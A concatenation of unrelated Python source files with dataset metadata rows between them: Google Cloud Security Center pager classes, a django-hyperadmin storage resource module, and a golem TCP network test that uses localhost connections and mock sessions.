attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.GroupAssetsResponse],
request: securitycenter_service.GroupAssetsRequest,
response: securitycenter_service.GroupAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.GroupAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.GroupResult]:
for page in self.pages:
yield from page.group_by_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
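# Rough usage sketch (assumes a configured SecurityCenterClient; names are illustrative):
#
#   pager = client.group_assets(request={"parent": "organizations/123",
#                                        "group_by": "security_center_properties.resource_type"})
#   for group_result in pager:   # additional pages are fetched transparently
#       print(group_result)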
class GroupAssetsAsyncPager:
"""A pager for iterating through ``group_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``GroupAssets`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.GroupAssetsResponse]],
request: securitycenter_service.GroupAssetsRequest,
response: securitycenter_service.GroupAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.GroupAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.GroupResult]:
async def async_generator():
async for page in self.pages:
for response in page.group_by_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class GroupFindingsPager:
"""A pager for iterating through ``group_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse` object, and
provides an ``__iter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``GroupFindings`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.GroupFindingsResponse],
request: securitycenter_service.GroupFindingsRequest,
response: securitycenter_service.GroupFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.GroupFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.GroupResult]:
for page in self.pages:
yield from page.group_by_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class GroupFindingsAsyncPager:
"""A pager for iterating through ``group_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``GroupFindings`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.GroupFindingsResponse]],
request: securitycenter_service.GroupFindingsRequest,
response: securitycenter_service.GroupFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.GroupFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.GroupResult]:
async def async_generator():
async for page in self.pages:
for response in page.group_by_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListAssetsPager:
"""A pager for iterating through ``list_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse` object, and
provides an ``__iter__`` method to iterate through its
``list_assets_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListAssets`` requests and continue to iterate
through the ``list_assets_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListAssetsResponse],
request: securitycenter_service.ListAssetsRequest,
response: securitycenter_service.ListAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.ListAssetsResponse.ListAssetsResult]:
for page in self.pages:
yield from page.list_assets_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListAssetsAsyncPager:
"""A pager for iterating through ``list_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``list_assets_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListAssets`` requests and continue to iterate
through the ``list_assets_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListAssetsResponse]],
request: securitycenter_service.ListAssetsRequest,
response: securitycenter_service.ListAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.ListAssetsResponse.ListAssetsResult]:
async def async_generator():
async for page in self.pages:
for response in page.list_assets_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListFindingsPager:
"""A pager for iterating through ``list_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse` object, and
provides an ``__iter__`` method to iterate through its
``list_findings_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListFindings`` requests and continue to iterate
through the ``list_findings_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListFindingsResponse],
request: securitycenter_service.ListFindingsRequest,
response: securitycenter_service.ListFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.ListFindingsResponse.ListFindingsResult]:
for page in self.pages:
yield from page.list_findings_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListFindingsAsyncPager:
"""A pager for iterating through ``list_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``list_findings_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListFindings`` requests and continue to iterate
through the ``list_findings_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListFindingsResponse]],
request: securitycenter_service.ListFindingsRequest,
response: securitycenter_service.ListFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListFindingsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.ListFindingsResponse.ListFindingsResult]:
async def async_generator():
async for page in self.pages:
for response in page.list_findings_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListNotificationConfigsPager:
"""A pager for iterating through ``list_notification_configs`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse` object, and
provides an ``__iter__`` method to iterate through its
``notification_configs`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListNotificationConfigs`` requests and continue to iterate
through the ``notification_configs`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListNotificationConfigsResponse],
request: securitycenter_service.ListNotificationConfigsRequest,
response: securitycenter_service.ListNotificationConfigsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListNotificationConfigsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListNotificationConfigsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[notification_config.NotificationConfig]:
for page in self.pages:
yield from page.notification_configs
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListNotificationConfigsAsyncPager:
"""A pager for iterating through ``list_notification_configs`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``notification_configs`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListNotificationConfigs`` requests and continue to iterate
through the ``notification_configs`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListNotificationConfigsResponse]],
request: securitycenter_service.ListNotificationConfigsRequest,
response: securitycenter_service.ListNotificationConfigsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListNotificationConfigsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListNotificationConfigsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListNotificationConfigsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[notification_config.NotificationConfig]:
async def async_generator():
async for page in self.pages:
for response in page.notification_configs:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListSourcesPager:
"""A pager for iterating through ``list_sources`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse` object, and
provides an ``__iter__`` method to iterate through its
``sources`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListSources`` requests and continue to iterate
through the ``sources`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.ListSourcesResponse],
request: securitycenter_service.ListSourcesRequest,
response: securitycenter_service.ListSourcesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListSourcesRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListSourcesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.ListSourcesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[source.Source]:
for page in self.pages:
yield from page.sources
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListSourcesAsyncPager:
"""A pager for iterating through ``list_sources`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``sources`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListSources`` requests and continue to iterate
through the ``sources`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.ListSourcesResponse]],
request: securitycenter_service.ListSourcesRequest,
response: securitycenter_service.ListSourcesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.ListSourcesRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.ListSourcesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.ListSourcesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.ListSourcesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[source.Source]:
async def async_generator():
async for page in self.pages:
for response in page.sources:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| apache-2.0 | -5,133,013,779,977,619,000 | 42.432181 | 105 | 0.660788 | false |
zbyte64/django-hyperadmin | hyperadmin/resources/storages/resources.py | 1 | 4161 | import os
from django.core.exceptions import ObjectDoesNotExist
from hyperadmin.links import Link
from hyperadmin.resources.crud import CRUDResource
from hyperadmin.resources.storages.forms import UploadForm, Base64UploadForm, UploadLinkForm
from hyperadmin.resources.storages.indexes import StorageIndex
from hyperadmin.resources.storages.endpoints import ListEndpoint, CreateUploadEndpoint, Base64UploadEndpoint, BoundFile
class StorageQuery(object):
def __init__(self, storage, path=''):
self.storage = storage
self.path = path
def filter(self, path):
if self.path:
path = os.path.join(self.path, path)
return StorageQuery(self.storage, path)
def get_dirs_and_files(self):
try:
dirs, files = self.storage.listdir(self.path)
except NotImplementedError:
return [], []
if self.path:
files = [os.path.join(self.path, filename) for filename in files]
return dirs, [BoundFile(self.storage, filename) for filename in files]
def get(self, path):
if self.path:
path = os.path.join(self.path, path)
if not self.storage.exists(path):
raise ObjectDoesNotExist
return BoundFile(self.storage, path)
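# Rough usage sketch (hypothetical storage instance):
#   query = StorageQuery(storage).filter('uploads')   # narrow the listing to 'uploads/'
#   dirs, files = query.get_dirs_and_files()          # files come back as BoundFile objects
#   bound = query.get('report.txt')                   # raises ObjectDoesNotExist if absent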
class StorageResource(CRUDResource):
#resource_adaptor = storage object
form_class = UploadForm
upload_link_form_class = UploadLinkForm
base64_upload_form_class = Base64UploadForm
list_endpoint = (ListEndpoint, {})
create_upload_endpoint = (CreateUploadEndpoint, {})
base64_upload_endpoint = (Base64UploadEndpoint, {})
def __init__(self, **kwargs):
kwargs.setdefault('app_name', '-storages')
super(StorageResource, self).__init__(**kwargs)
def get_storage(self):
return self.resource_adaptor
storage = property(get_storage)
def get_base64_upload_form_class(self):
return self.base64_upload_form_class
def get_upload_link_form_class(self):
return self.upload_link_form_class
def get_view_endpoints(self):
endpoints = super(StorageResource, self).get_view_endpoints()
endpoints.insert(0, self.create_upload_endpoint)
return endpoints
def get_indexes(self):
return {'primary': StorageIndex('primary', self)}
def get_primary_query(self):
return StorageQuery(self.storage)
def get_instances(self):
'''
Returns a set of native objects for a given state
'''
if 'page' in self.state:
return self.state['page'].object_list
if self.state.has_view_class('change_form'):
return []
        # get_dirs_and_files() already returns the files wrapped as BoundFile objects
        dirs, files = self.get_primary_query().get_dirs_and_files()
        return list(files)
def get_item_form_kwargs(self, item=None, **kwargs):
kwargs = super(StorageResource, self).get_item_form_kwargs(item, **kwargs)
kwargs['storage'] = self.storage
return kwargs
def get_form_kwargs(self, **kwargs):
kwargs = super(StorageResource, self).get_form_kwargs(**kwargs)
kwargs['storage'] = self.storage
return kwargs
def get_upload_link_form_kwargs(self, **kwargs):
kwargs = self.get_form_kwargs(**kwargs)
kwargs['resource'] = self
kwargs['request'] = self.api_request.request
return kwargs
def get_item_url(self, item):
return self.link_prototypes['update'].get_url(item=item)
def get_item_storage_link(self, item, **kwargs):
link_kwargs = {'url': item.instance.url,
'resource': self,
'prompt': 'Absolute Url',
'rel': 'storage-url', }
link_kwargs.update(kwargs)
storage_link = Link(**link_kwargs)
return storage_link
def get_item_outbound_links(self, item):
links = self.create_link_collection()
links.append(self.get_item_storage_link(item, link_factor='LO'))
return links
def get_item_prompt(self, item):
return item.instance.name
def get_paginator_kwargs(self):
return {}
| bsd-3-clause | -3,845,229,485,147,536,400 | 33.106557 | 119 | 0.641192 | false |
imapp-pl/golem | tests/golem/network/transport/test_network.py | 1 | 14603 | import logging
import os
import time
import unittest
from contextlib import contextmanager
from golem.core.databuffer import DataBuffer
from golem.network.transport.message import Message, MessageHello, init_messages
from golem.network.transport.network import ProtocolFactory, SessionFactory, SessionProtocol
from golem.network.transport.tcpnetwork import TCPNetwork, TCPListenInfo, TCPListeningInfo, TCPConnectInfo, \
SocketAddress, BasicProtocol, ServerProtocol, SafeProtocol
from golem.tools.testwithreactor import TestWithReactor
class ASession(object):
def __init__(self, conn):
self.conn = conn
self.dropped_called = False
self.msgs = []
def dropped(self):
self.dropped_called = True
def interpret(self, msg):
self.msgs.append(msg)
def sign(self, msg):
msg.sig = "ASessionSign"
return msg
def encrypt(self, msg):
return "ASessionEncrypt{}".format(msg)
def decrypt(self, msg):
if os.path.commonprefix([msg, "ASessionEncrypt"]) != "ASessionEncrypt":
return None
else:
return msg[len("ASessionEncrypt"):]
class AProtocol(object, SessionProtocol):
def __init__(self, server):
self.server = server
timeout = 20
@contextmanager
def async_scope(status, idx=0):
status[idx] = False
started = time.time()
yield
while not status[idx]:
if time.time() - started >= timeout:
raise RuntimeError('Operation timed out')
time.sleep(0.2)
def get_port():
min_port = 49200
max_port = 65535
test_port_range = 1000
base = int(time.time() * 10 ** 6) % (max_port - min_port - test_port_range)
return base + min_port
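# Worked example of the arithmetic above (illustrative numbers): with min_port=49200,
# max_port=65535 and test_port_range=1000 the modulus is 15335, so a timestamp t with
# int(t * 10**6) % 15335 == 12345 yields port 49200 + 12345 = 61545.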
class TestNetwork(TestWithReactor):
reactor_thread = None
prev_reactor = None
timeout = 10
def setUp(self):
logging.basicConfig(level=logging.DEBUG)
self.listen_success = None
self.connect_success = None
self.stop_listening_success = None
self.port = None
self.kwargs_len = 0
session_factory = SessionFactory(ASession)
protocol_factory = ProtocolFactory(SafeProtocol, Server(), session_factory)
self.network = TCPNetwork(protocol_factory)
def test(self):
listen_status = [False]
conn_status = [False, False, False]
def _listen_success(*args, **kwargs):
self.__listen_success(*args, **kwargs)
listen_status[0] = True
def _listen_failure(**kwargs):
self.__listen_failure(**kwargs)
listen_status[0] = True
def _conn_success(idx):
def fn(*args, **kwargs):
self.__connection_success(*args, **kwargs)
conn_status[idx] = True
return fn
def _conn_failure(idx):
def fn(**kwargs):
self.__connection_failure(**kwargs)
conn_status[idx] = True
return fn
def _listen_stop_success(*args, **kwargs):
self.__stop_listening_success(*args, **kwargs)
listen_status[0] = True
def _listen_stop_failure(**kwargs):
self.__stop_listening_failure(**kwargs)
listen_status[0] = True
port = get_port()
# listen
listen_info = TCPListenInfo(port,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, port)
self.assertEquals(len(self.network.active_listeners), 1)
listen_info = TCPListenInfo(port,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, None)
self.assertEquals(len(self.network.active_listeners), 1)
listen_info = TCPListenInfo(port, port + 1000,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, port + 1)
self.assertEquals(len(self.network.active_listeners), 2)
with async_scope(listen_status):
self.network.listen(listen_info, a=1, b=2, c=3, d=4, e=5)
self.assertEquals(self.port, port + 2)
self.assertEquals(self.kwargs_len, 5)
self.assertEquals(len(self.network.active_listeners), 3)
# connect
address = SocketAddress('localhost', port)
connect_info = TCPConnectInfo([address], _conn_success(0), _conn_failure(0))
self.connect_success = None
with async_scope(conn_status, 0):
self.network.connect(connect_info)
self.assertTrue(self.connect_success)
address2 = SocketAddress('localhost', port + 1)
connect_info_2 = TCPConnectInfo([address2], _conn_success(1), _conn_failure(1))
self.connect_success = None
with async_scope(conn_status, 1):
self.network.connect(connect_info_2)
self.assertTrue(self.connect_success)
connect_info_3 = TCPConnectInfo([address, address2], _conn_success(2), _conn_failure(2))
self.connect_success = None
with async_scope(conn_status, 2):
self.network.connect(connect_info_3)
self.assertTrue(self.connect_success)
# stop listening
listening_info = TCPListeningInfo(port,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
d = self.network.stop_listening(listening_info)
self.assertTrue(d.called)
self.assertEquals(len(self.network.active_listeners), 2)
self.assertTrue(self.stop_listening_success)
listening_info = TCPListeningInfo(port,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 2)
self.assertFalse(self.stop_listening_success)
listening_info = TCPListeningInfo(port + 1,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 1)
self.assertTrue(self.stop_listening_success)
listening_info = TCPListeningInfo(port + 2,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 0)
self.assertTrue(self.stop_listening_success)
# listen on previously closed ports
listen_info = TCPListenInfo(port, port + 4,
established_callback=_listen_success,
failure_callback=_listen_failure)
with async_scope(listen_status):
self.network.listen(listen_info)
self.assertEquals(self.port, port)
self.assertEquals(len(self.network.active_listeners), 1)
listening_info = TCPListeningInfo(port,
stopped_callback=_listen_stop_success,
stopped_errback=_listen_stop_failure)
with async_scope(listen_status):
self.network.stop_listening(listening_info)
self.assertEquals(len(self.network.active_listeners), 0)
def __listen_success(self, port, **kwargs):
self.listen_success = True
self.port = port
self.kwargs_len = len(kwargs)
def __listen_failure(self, **kwargs):
self.port = None
self.listen_success = False
def __connection_success(self, result, **kwargs):
self.connect_success = True
def __connection_failure(self, **kwargs):
self.connect_success = False
def __stop_listening_success(self, **kwargs):
self.stop_listening_success = True
def __stop_listening_failure(self, **kwargs):
self.stop_listening_success = False
class Server:
def __init__(self):
self.new_connection_called = 0
self.sessions = []
def new_connection(self, session):
self.new_connection_called += 1
self.sessions.append(session)
class Transport:
def __init__(self):
self.lose_connection_called = False
self.abort_connection_called = False
self.buff = []
def loseConnection(self):
self.lose_connection_called = True
def abortConnection(self):
self.abort_connection_called = True
def getHandle(self):
pass
def write(self, msg):
self.buff.append(msg)
